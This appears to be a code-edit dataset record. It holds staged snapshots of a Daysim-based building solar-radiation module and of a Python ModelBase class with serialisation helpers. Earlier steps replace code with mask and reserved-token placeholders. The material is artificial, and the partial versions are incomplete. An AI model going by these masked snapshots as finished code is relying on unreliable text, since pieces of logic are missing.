py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(\n mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [(calculate.face_area(x) * (1.0 - scalar)) for x, scalar in\n zip(sensor_surfaces, sensor_intersection)]\n return (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, sensor_intersection)\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size['walls_grid']\n sensor_horizontal_grid_dim = grid_size['roof_grid']\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry,\n 'orientation_{srf_type}'.format(srf_type=srf_type))\n normals_list = getattr(building_geometry, 'normals_{srf_type}'.\n format(srf_type=srf_type))\n interesection_list = getattr(building_geometry,\n 'intersect_{srf_type}'.format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list,\n normals_list, occface_list, interesection_list):\n (sensor_dir, sensor_cord, sensor_type, sensor_area,\n sensor_orientation, 
sensor_intersection) = (\n generate_sensor_surfaces(face, sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim, srf_type, orientation, normal,\n intersection))\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n return (sensor_dir_list, sensor_cord_list, sensor_type_list,\n sensor_area_list, sensor_orientation_list, sensor_intersection_list)\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(\n geometry_pickle_dir, 'zone', building_name))\n (sensors_dir_building, sensors_coords_building,\n sensors_type_building, sensors_area_building,\n sensor_orientation_building, sensor_intersection_building\n ) = calc_sensors_building(building_geometry, grid_size)\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n sensors_code = [('srf' + str(x)) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n sensor_intersection_zone.append(sensor_intersection_building)\n names_zone.append(building_name)\n pd.DataFrame({'BUILDING': building_name, 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building, 'intersection':\n sensor_intersection_building, 'Xcoor': [x[0] for x in\n sensors_coords_building], 'Ycoor': [x[1] for x in\n sensors_coords_building], 'Zcoor': [x[2] for x in\n sensors_coords_building], 'Xdir': [x[0] for x in\n sensors_dir_building], 'Ydir': [x[1] for x in\n sensors_dir_building], 'Zdir': [x[2] for x in\n sensors_dir_building], 'AREA_m2': sensors_area_building, 'TYPE':\n sensors_type_building}).to_csv(locator.get_radiation_metadata(\n building_name), index=None)\n return (sensors_coords_zone, sensors_dir_zone,\n sensors_total_number_list, names_zone, sensors_code_zone,\n sensor_intersection_zone)\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator,\n radiance_parameters, write_sensor_data, grid_size, max_global,\n weatherfile, geometry_pickle_dir):\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.\n format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=\n daysim_project.project_path))\n print('Calculating and sending sensor points')\n (sensors_coords_zone, sensors_dir_zone, sensors_number_zone, names_zone,\n sensors_code_zone, sensor_intersection_zone) = (calc_sensors_zone(\n building_names, locator, grid_size, geometry_pickle_dir))\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone,\n sensors_dir_zone, num_sensors, 'w/m2')\n print('Starting Daysim simulation for buildings: {buildings}'.format(\n buildings=names_zone))\n print('Total number of sensors: {num_sensors}'.format(num_sensors=\n num_sensors))\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters['rad_ab'],\n radiance_parameters['rad_ad'], radiance_parameters['rad_as'],\n radiance_parameters['rad_ar'], radiance_parameters['rad_aa'],\n radiance_parameters['rad_lr'], 
radiance_parameters['rad_st'],\n radiance_parameters['rad_sj'], radiance_parameters['rad_lw'],\n radiance_parameters['rad_dj'], radiance_parameters['rad_ds'],\n radiance_parameters['rad_dr'], radiance_parameters['rad_dp'])\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n print('Writing results to disk')\n index = 0\n for building_name, sensors_number_building, sensor_code_building, sensor_intersection_building in zip(\n names_zone, sensors_number_zone, sensors_code_zone,\n sensor_intersection_zone):\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building,\n selection_of_results.tolist()))\n index = index + sensors_number_building\n write_aggregated_results(building_name,\n items_sensor_name_and_result, locator, weatherfile)\n if write_sensor_data:\n write_sensor_results(building_name,\n items_sensor_name_and_result, locator)\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w'\n ) as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result,\n locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW', 'windows_west_kW',\n 'windows_south_kW', 'windows_north_kW', 'walls_east_kW',\n 'walls_west_kW', 'walls_south_kW', 'walls_north_kW', 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2', 'windows_west_m2',\n 'windows_south_m2', 'windows_north_m2', 'walls_east_m2',\n 'walls_west_m2', 'walls_south_m2', 'walls_north_m2', 'roofs_top_m2']\n dict_not_aggregated = {}\n for field, field_area in zip(solar_analysis_fields,\n solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index(\n 'SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([(select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])) for surface in\n select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] = array_field / 1000\n dict_not_aggregated[field_area] = area_m2\n data_aggregated_kW = pd.DataFrame(dict_not_aggregated).round(2)\n data_aggregated_kW['Date'] = weatherfile['date']\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-5": "import json\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport py4design.py2radiance as py2radiance\nimport py4design.py3dmodel.calculate as calculate\nfrom py4design import py3dmodel\n\n__author__ = \"Jimeno A. Fonseca\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Jimeno A. Fonseca\", \"Kian Wee Chen\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"[email protected]\"\n__status__ = \"Production\"\n\nfrom cea.constants import HOURS_IN_YEAR\nfrom cea.resources.radiation_daysim.geometry_generator import BuildingGeometry\nfrom cea import suppress_3rd_party_debug_loggers\n\nsuppress_3rd_party_debug_loggers()\n\n\ndef create_sensor_input_file(rad, chunk_n):\n sensor_file_path = os.path.join(rad.data_folder_path, \"points_\" + str(chunk_n) + \".pts\")\n sensor_file = open(sensor_file_path, \"w\")\n sensor_pts_data = py2radiance.write_rad.sensor_file(rad.sensor_positions, rad.sensor_normals)\n sensor_file.write(sensor_pts_data)\n sensor_file.close()\n rad.sensor_file_path = sensor_file_path\n\n\ndef generate_sensor_surfaces(occface, wall_dim, roof_dim, srf_type, orientation, normal, intersection):\n mid_pt = py3dmodel.calculate.face_midpt(occface)\n location_pt = py3dmodel.modify.move_pt(mid_pt, normal, 0.01)\n moved_oface = py3dmodel.fetch.topo2topotype(py3dmodel.modify.move(mid_pt, location_pt, occface))\n if srf_type == 'roofs':\n xdim = ydim = roof_dim\n else:\n xdim = ydim = wall_dim\n # put it into occ and subdivide surfaces\n sensor_surfaces = py3dmodel.construct.grid_face(moved_oface, xdim, ydim)\n\n # calculate list of properties per surface\n sensor_intersection = [intersection for x in sensor_surfaces]\n sensor_dir = [normal for x in sensor_surfaces]\n sensor_cord = [py3dmodel.calculate.face_midpt(x) for x in sensor_surfaces]\n sensor_type = [srf_type for x in sensor_surfaces]\n sensor_orientation = [orientation for x in sensor_surfaces]\n sensor_area = [calculate.face_area(x) * (1.0 - scalar) for x, scalar in zip(sensor_surfaces, sensor_intersection)]\n\n return sensor_dir, sensor_cord, sensor_type, sensor_area, sensor_orientation, sensor_intersection\n\n\ndef calc_sensors_building(building_geometry, grid_size):\n sensor_dir_list = []\n sensor_cord_list = []\n sensor_type_list = []\n sensor_area_list = []\n sensor_orientation_list = []\n sensor_intersection_list = []\n surfaces_types = ['walls', 'windows', 'roofs']\n sensor_vertical_grid_dim = grid_size[\"walls_grid\"]\n sensor_horizontal_grid_dim = grid_size[\"roof_grid\"]\n for srf_type in surfaces_types:\n occface_list = getattr(building_geometry, srf_type)\n if srf_type == 'roofs':\n orientation_list = ['top'] * len(occface_list)\n normals_list = [(0.0, 0.0, 1.0)] * len(occface_list)\n interesection_list = [0] * len(occface_list)\n elif srf_type == 'windows':\n orientation_list = getattr(building_geometry, \"orientation_{srf_type}\".format(srf_type=srf_type))\n normals_list = getattr(building_geometry, \"normals_{srf_type}\".format(srf_type=srf_type))\n interesection_list = [0] * len(occface_list)\n else:\n orientation_list = getattr(building_geometry, \"orientation_{srf_type}\".format(srf_type=srf_type))\n normals_list = getattr(building_geometry, \"normals_{srf_type}\".format(srf_type=srf_type))\n interesection_list = getattr(building_geometry, \"intersect_{srf_type}\".format(srf_type=srf_type))\n for orientation, normal, face, intersection in zip(orientation_list, normals_list, occface_list,\n 
interesection_list):\n sensor_dir, \\\n sensor_cord, \\\n sensor_type, \\\n sensor_area, \\\n sensor_orientation, \\\n sensor_intersection = generate_sensor_surfaces(face,\n sensor_vertical_grid_dim,\n sensor_horizontal_grid_dim,\n srf_type,\n orientation,\n normal,\n intersection)\n sensor_intersection_list.extend(sensor_intersection)\n sensor_dir_list.extend(sensor_dir)\n sensor_cord_list.extend(sensor_cord)\n sensor_type_list.extend(sensor_type)\n sensor_area_list.extend(sensor_area)\n sensor_orientation_list.extend(sensor_orientation)\n\n return sensor_dir_list, sensor_cord_list, sensor_type_list, sensor_area_list, sensor_orientation_list, sensor_intersection_list\n\n\ndef calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir):\n sensors_coords_zone = []\n sensors_dir_zone = []\n sensors_total_number_list = []\n names_zone = []\n sensors_code_zone = []\n sensor_intersection_zone = []\n for building_name in building_names:\n building_geometry = BuildingGeometry.load(os.path.join(geometry_pickle_dir, 'zone', building_name))\n # get sensors in the building\n sensors_dir_building, \\\n sensors_coords_building, \\\n sensors_type_building, \\\n sensors_area_building, \\\n sensor_orientation_building, \\\n sensor_intersection_building = calc_sensors_building(building_geometry, grid_size)\n\n # get the total number of sensors and store in lst\n sensors_number = len(sensors_coords_building)\n sensors_total_number_list.append(sensors_number)\n\n sensors_code = ['srf' + str(x) for x in range(sensors_number)]\n sensors_code_zone.append(sensors_code)\n\n # get the total list of coordinates and directions to send to daysim\n sensors_coords_zone.extend(sensors_coords_building)\n sensors_dir_zone.extend(sensors_dir_building)\n\n # get total list of intersections\n sensor_intersection_zone.append(sensor_intersection_building)\n\n # get the name of all buildings\n names_zone.append(building_name)\n\n # save sensors geometry result to disk\n pd.DataFrame({'BUILDING': building_name,\n 'SURFACE': sensors_code,\n 'orientation': sensor_orientation_building,\n 'intersection': sensor_intersection_building,\n 'Xcoor': [x[0] for x in sensors_coords_building],\n 'Ycoor': [x[1] for x in sensors_coords_building],\n 'Zcoor': [x[2] for x in sensors_coords_building],\n 'Xdir': [x[0] for x in sensors_dir_building],\n 'Ydir': [x[1] for x in sensors_dir_building],\n 'Zdir': [x[2] for x in sensors_dir_building],\n 'AREA_m2': sensors_area_building,\n 'TYPE': sensors_type_building}).to_csv(locator.get_radiation_metadata(building_name), index=None)\n\n return sensors_coords_zone, sensors_dir_zone, sensors_total_number_list, names_zone, sensors_code_zone, sensor_intersection_zone\n\n\ndef isolation_daysim(chunk_n, cea_daysim, building_names, locator, radiance_parameters, write_sensor_data, grid_size,\n max_global, weatherfile, geometry_pickle_dir):\n # initialize daysim project\n daysim_project = cea_daysim.initialize_daysim_project('chunk_{n}'.format(n=chunk_n))\n print('Creating daysim project in: {daysim_dir}'.format(daysim_dir=daysim_project.project_path))\n\n # calculate sensors\n print(\"Calculating and sending sensor points\")\n sensors_coords_zone, \\\n sensors_dir_zone, \\\n sensors_number_zone, \\\n names_zone, \\\n sensors_code_zone, \\\n sensor_intersection_zone = calc_sensors_zone(building_names, locator, grid_size, geometry_pickle_dir)\n\n num_sensors = sum(sensors_number_zone)\n daysim_project.create_sensor_input_file(sensors_coords_zone, sensors_dir_zone, num_sensors, \"w/m2\")\n\n 
print(\"Starting Daysim simulation for buildings: {buildings}\".format(buildings=names_zone))\n print(\"Total number of sensors: {num_sensors}\".format(num_sensors=num_sensors))\n\n print('Writing radiance parameters')\n daysim_project.write_radiance_parameters(radiance_parameters[\"rad_ab\"], radiance_parameters[\"rad_ad\"],\n radiance_parameters[\"rad_as\"], radiance_parameters[\"rad_ar\"],\n radiance_parameters[\"rad_aa\"], radiance_parameters[\"rad_lr\"],\n radiance_parameters[\"rad_st\"], radiance_parameters[\"rad_sj\"],\n radiance_parameters[\"rad_lw\"], radiance_parameters[\"rad_dj\"],\n radiance_parameters[\"rad_ds\"], radiance_parameters[\"rad_dr\"],\n radiance_parameters[\"rad_dp\"])\n\n print('Executing hourly solar isolation calculation')\n daysim_project.execute_gen_dc()\n daysim_project.execute_ds_illum()\n\n print('Reading results...')\n solar_res = daysim_project.eval_ill()\n\n # check inconsistencies and replace by max value of weather file\n print('Fixing inconsistencies, if any')\n solar_res = np.clip(solar_res, a_min=0.0, a_max=max_global)\n\n # Check if leap year and remove extra day\n if solar_res.shape[1] == HOURS_IN_YEAR + 24:\n print('Removing leap day')\n leap_day_hours = range(1416, 1440)\n solar_res = np.delete(solar_res, leap_day_hours, axis=1)\n\n print(\"Writing results to disk\")\n index = 0\n for building_name, \\\n sensors_number_building, \\\n sensor_code_building, \\\n sensor_intersection_building in zip(names_zone,\n sensors_number_zone,\n sensors_code_zone,\n sensor_intersection_zone):\n # select sensors data\n selection_of_results = solar_res[index:index + sensors_number_building]\n selection_of_results[np.array(sensor_intersection_building) == 1] = 0\n items_sensor_name_and_result = dict(zip(sensor_code_building, selection_of_results.tolist()))\n index = index + sensors_number_building\n\n # create summary and save to disk\n write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile)\n\n if write_sensor_data:\n write_sensor_results(building_name, items_sensor_name_and_result, locator)\n\n # erase daysim folder to avoid conflicts after every iteration\n print('Removing results folder')\n daysim_project.cleanup_project()\n\n\ndef write_sensor_results(building_name, items_sensor_name_and_result, locator):\n with open(locator.get_radiation_building_sensors(building_name), 'w') as outfile:\n json.dump(items_sensor_name_and_result, outfile)\n\n\ndef write_aggregated_results(building_name, items_sensor_name_and_result, locator, weatherfile):\n geometry = pd.read_csv(locator.get_radiation_metadata(building_name))\n geometry['code'] = geometry['TYPE'] + '_' + geometry['orientation'] + '_kW'\n solar_analysis_fields = ['windows_east_kW',\n 'windows_west_kW',\n 'windows_south_kW',\n 'windows_north_kW',\n 'walls_east_kW',\n 'walls_west_kW',\n 'walls_south_kW',\n 'walls_north_kW',\n 'roofs_top_kW']\n solar_analysis_fields_area = ['windows_east_m2',\n 'windows_west_m2',\n 'windows_south_m2',\n 'windows_north_m2',\n 'walls_east_m2',\n 'walls_west_m2',\n 'walls_south_m2',\n 'walls_north_m2',\n 'roofs_top_m2']\n dict_not_aggregated = {}\n\n for field, field_area in zip(solar_analysis_fields, solar_analysis_fields_area):\n select_sensors = geometry.loc[geometry['code'] == field].set_index('SURFACE')\n area_m2 = select_sensors['AREA_m2'].sum()\n array_field = np.array([select_sensors.loc[surface, 'AREA_m2'] *\n np.array(items_sensor_name_and_result[surface])\n for surface in select_sensors.index]).sum(axis=0)\n dict_not_aggregated[field] 
= array_field / 1000 # in kWh\n dict_not_aggregated[field_area] = area_m2\n\n data_aggregated_kW = (pd.DataFrame(dict_not_aggregated)).round(2)\n data_aggregated_kW[\"Date\"] = weatherfile[\"date\"]\n data_aggregated_kW.set_index('Date', inplace=True)\n data_aggregated_kW.to_csv(locator.get_radiation_building(building_name))\n",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
<|reserved_special_token_0|>
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
            raise ResponseError(info='No record exists for the given id')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
<|reserved_special_token_0|>
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
            raise ResponseError(info='No record exists for the given id')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ModelBase:
<|reserved_special_token_0|>
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
<|reserved_special_token_0|>
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False
):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [name for name in attrs.keys() if
not name.startswith('_')]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in
exclude_keys]
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, 'to_dict'):
list_values.append(item.to_dict(depth=depth + 1,
lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, 'to_dict'):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, 'to_dict'):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
            raise ResponseError(info='No record exists for the given id')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
from abc import ABCMeta, abstractmethod
from datetime import datetime
from enum import Enum
from application.response import ResponseError
class ModelBase:
__metaclass__ = ABCMeta
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
@property
def id(self):
return self.schema.id
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False
):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [name for name in attrs.keys() if
not name.startswith('_')]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in
exclude_keys]
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, 'to_dict'):
list_values.append(item.to_dict(depth=depth + 1,
lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, 'to_dict'):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, 'to_dict'):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
            raise ResponseError(info='No record exists for the given id')
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
<|reserved_special_token_1|>
from abc import ABCMeta, abstractmethod
from datetime import datetime
from enum import Enum
from application.response import ResponseError
class ModelBase:
__metaclass__ = ABCMeta
@classmethod
@abstractmethod
def _get_cls_schema(cls):
pass
def __new__(cls, schema):
if schema is None:
return None
else:
return object.__new__(cls)
def __init__(self, schema):
self.schema = schema
@property
def id(self):
return self.schema.id
@property
def uid(self):
return self.schema.uid
def refresh(self):
self.schema = self._get_cls_schema().query.get(self.schema.id)
def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False):
""" 把用 property 装饰的属性封装到一个 dict 中再返回
:param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性
:param exclude_keys, list, 指定需要排除的属性, 默认为 []
:param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层
:param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys
"""
return_dict = {}
attrs = self.__class__.__dict__
include_keys = include_keys or [
name for name in attrs.keys() if not name.startswith("_")
]
exclude_keys = exclude_keys or []
if lite is True:
lite_exclude_keys = getattr(self, "lite_exclude_keys", [])
exclude_keys = exclude_keys + lite_exclude_keys
include_keys = [name for name in include_keys if name not in exclude_keys]
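        # beyond one level of nesting, collapse the referenced object to its uid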
if depth > 1:
return self.uid
for key, value in attrs.items():
if key not in include_keys:
continue
if not isinstance(value, property):
continue
value = getattr(self, key)
if isinstance(value, Enum):
return_dict[key] = value.value
elif isinstance(value, list):
list_values = []
for item in value:
if hasattr(item, "to_dict"):
list_values.append(item.to_dict(depth=depth + 1, lite=True))
else:
list_values.append(item)
return_dict[key] = list_values
elif isinstance(value, dict):
dict_values = {}
for k, v in value.items():
if hasattr(v, "to_dict"):
dict_values[k] = v.to_dict(depth=depth + 1, lite=True)
else:
dict_values[k] = v
return_dict[key] = dict_values
elif isinstance(value, datetime):
return_dict[key] = value.isoformat()
elif hasattr(value, "to_dict"):
return_dict[key] = value.to_dict(depth=depth + 1, lite=True)
else:
return_dict[key] = value
return return_dict
@classmethod
def get_by_id(cls, id):
schema = cls._get_cls_schema().query.get(id)
if schema is None:
        raise ResponseError(info='对应编号信息不存在')  # i.e. "no record exists for the given id"
return cls(schema)
@classmethod
def get_by_uid(cls, uid):
schema = cls._get_cls_schema().query.filter_by(uid=uid).first()
return cls(schema)
|
flexible
|
{
"blob_id": "5917c891d2885f779dc33f189f1a875efbd0c302",
"index": 163,
"step-1": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n <mask token>\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-2": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n <mask token>\n\n @classmethod\n def get_by_id(cls, id):\n schema = cls._get_cls_schema().query.get(id)\n if schema is None:\n raise ResponseError(info='对应编号信息不存在')\n return cls(schema)\n\n @classmethod\n def get_by_uid(cls, uid):\n schema = cls._get_cls_schema().query.filter_by(uid=uid).first()\n return cls(schema)\n",
"step-3": "<mask token>\n\n\nclass ModelBase:\n <mask token>\n\n @classmethod\n @abstractmethod\n def _get_cls_schema(cls):\n pass\n\n def __new__(cls, schema):\n if schema is None:\n return None\n else:\n return object.__new__(cls)\n\n def __init__(self, schema):\n self.schema = schema\n <mask token>\n\n @property\n def uid(self):\n return self.schema.uid\n\n def refresh(self):\n self.schema = self._get_cls_schema().query.get(self.schema.id)\n\n def to_dict(self, include_keys=None, exclude_keys=None, depth=0, lite=False\n ):\n \"\"\" 把用 property 装饰的属性封装到一个 dict 中再返回\n :param include_keys, list, 指定需要返回的属性, 默认为全部, 但不包含下划线开始的属性\n :param exclude_keys, list, 指定需要排除的属性, 默认为 []\n :param depth, int, 深度, object 可能含有对其它 object 的引用, object.to_dict() 调用限定两层\n :param lite, boolean, 是否为精简版, 在精简版中还会考虑 object 的 lite_exclude_keys\n \"\"\"\n return_dict = {}\n attrs = self.__class__.__dict__\n include_keys = include_keys or [name for name in attrs.keys() if \n not name.startswith('_')]\n exclude_keys = exclude_keys or []\n if lite is True:\n lite_exclude_keys = getattr(self, 'lite_exclude_keys', [])\n exclude_keys = exclude_keys + lite_exclude_keys\n include_keys = [name for name in include_keys if name not in\n exclude_keys]\n if depth > 1:\n return self.uid\n for key, value in attrs.items():\n if key not in include_keys:\n continue\n if not isinstance(value, property):\n continue\n value = getattr(self, key)\n if isinstance(value, Enum):\n return_dict[key] = value.value\n elif isinstance(value, list):\n list_values = []\n for item in value:\n if hasattr(item, 'to_dict'):\n list_values.append(item.to_dict(depth=depth + 1,\n lite=True))\n else:\n list_values.append(item)\n return_dict[key] = list_values\n elif isinstance(value, dict):\n dict_values = {}\n for k, v in value.items():\n if hasattr(v, 'to_dict'):\n dict_values[k] = v.to_dict(depth=depth + 1, lite=True)\n else:\n dict_values[k] = v\n 